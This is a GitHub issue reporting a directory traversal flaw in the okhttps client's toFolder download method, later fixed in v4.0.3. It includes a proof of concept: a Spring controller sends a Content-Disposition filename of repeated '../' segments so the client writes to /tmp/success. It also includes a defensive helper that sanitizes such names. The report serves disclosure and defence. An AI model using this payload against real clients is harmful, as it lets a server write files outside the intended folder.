troyzhxu / okhttps

Elegant as art, simple as 1, 2, 3, usable on both front end and back end: a lightweight yet powerful HTTP client (with WebSocket and Stomp protocol support)
https://ok.zhxu.cn
Apache License 2.0

Possible directory traversal vulnerability when downloading files with the toFolder method #89

Closed arandomusernone closed 2 months ago

arandomusernone commented 9 months ago

Problem description

When using the toFolder method to download a file to a given directory, deriving the file name from the Content-Disposition header returned by the server leads to a directory traversal vulnerability. If the filename returned by the server contains `../`, the file is saved under a different path than the intended directory.

Steps to reproduce

Client:

```java
// Client: downloads /a.zip and lets toFolder() pick the file name
// from the server's Content-Disposition header.
HTTP exp = HTTP.builder()
      .baseUrl("http://127.0.0.1:8080")
      .build();
exp.sync("/a.zip")
      .get().getBody()
      .toFolder("/Users/e4stjun/Desktop/test")
      .start();
```

Server:

```java
import javax.servlet.http.HttpServletResponse;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;

// Server: returns a Content-Disposition whose filename climbs out of the
// download folder, so the client writes the body to /tmp/success.
@RestController
public class ExpController {
    @RequestMapping("/a.zip")
    public String a(HttpServletResponse response)
    {
        response.setHeader("Content-Disposition","attachment;filename=../../../../../../../../../../../../../../../../../../../../../../tmp/success");
        return "success";
    }
}
```

Version used

troyzhxu commented 4 months ago

Received, will fix in the next version.

troyzhxu commented 2 months ago

Fixed in v4.0.3: https://github.com/troyzhxu/okhttps/releases/tag/v4.0.3
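The defensive check that closes this class of bug, as an added example: this is not OkHttps code and not the v4.0.3 patch, but a stand-alone helper (the class name `SafeDownloadName` and its methods are hypothetical) showing how a server-supplied `Content-Disposition` filename should be reduced to a bare file name and then verified to resolve inside the target folder before anything is written. The sample header values are constructed from the report above.

```java
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Hypothetical helper (not part of OkHttps): derive a safe output path from a
// server-supplied Content-Disposition header before writing into a folder.
public final class SafeDownloadName {

    // Matches filename=token or filename="quoted" (case-insensitive).
    // The RFC 5987 filename*= form is deliberately not handled here.
    private static final Pattern FILENAME =
            Pattern.compile("(?i)filename\\s*=\\s*\"?([^\";]+)\"?");

    // Returns the raw filename parameter, or null when the header has none.
    static String extractFilename(String contentDisposition) {
        if (contentDisposition == null) return null;
        Matcher m = FILENAME.matcher(contentDisposition);
        return m.find() ? m.group(1).trim() : null;
    }

    // Keep only the last path segment, so "../../tmp/success" collapses to
    // "success"; reject empty names, "." and "..", and embedded NUL bytes.
    static String sanitize(String name) {
        if (name == null) return null;
        // Strip directory components whether separated by '/' or '\'.
        int slash = Math.max(name.lastIndexOf('/'), name.lastIndexOf('\\'));
        String base = (slash >= 0 ? name.substring(slash + 1) : name).trim();
        if (base.isEmpty() || base.equals(".") || base.equals("..")) return null;
        if (base.indexOf('\0') >= 0) return null;
        return base;
    }

    // Resolve the sanitized name against the folder and confirm the result is
    // still inside it; throws instead of writing outside the folder.
    static Path resolveInside(Path folder, String headerValue) {
        Path root = folder.toAbsolutePath().normalize();
        String safe = sanitize(extractFilename(headerValue));
        if (safe == null) {
            throw new IllegalArgumentException("unusable filename in Content-Disposition");
        }
        Path target = root.resolve(safe).normalize();
        // Defence in depth: even after sanitize(), verify containment.
        if (!target.startsWith(root) || target.equals(root)) {
            throw new IllegalArgumentException("filename escapes download folder");
        }
        return target;
    }

    public static void main(String[] args) {
        Path folder = Paths.get("/Users/e4stjun/Desktop/test");
        // Constructed sample headers: one benign, one shaped like the report's PoC.
        String benign = "attachment; filename=\"report.zip\"";
        String traversal = "attachment;filename=../../../../tmp/success";
        System.out.println(resolveInside(folder, benign));
        System.out.println(resolveInside(folder, traversal));
    }
}
```

Both steps matter: `sanitize()` discards every directory component the server sent, and `resolveInside()` independently checks that the normalized result still starts with the download folder, so a future change to the name-extraction logic cannot silently reintroduce the traversal. A client that exposes the chosen file name to callers should also surface the rejection rather than falling back to the raw header value.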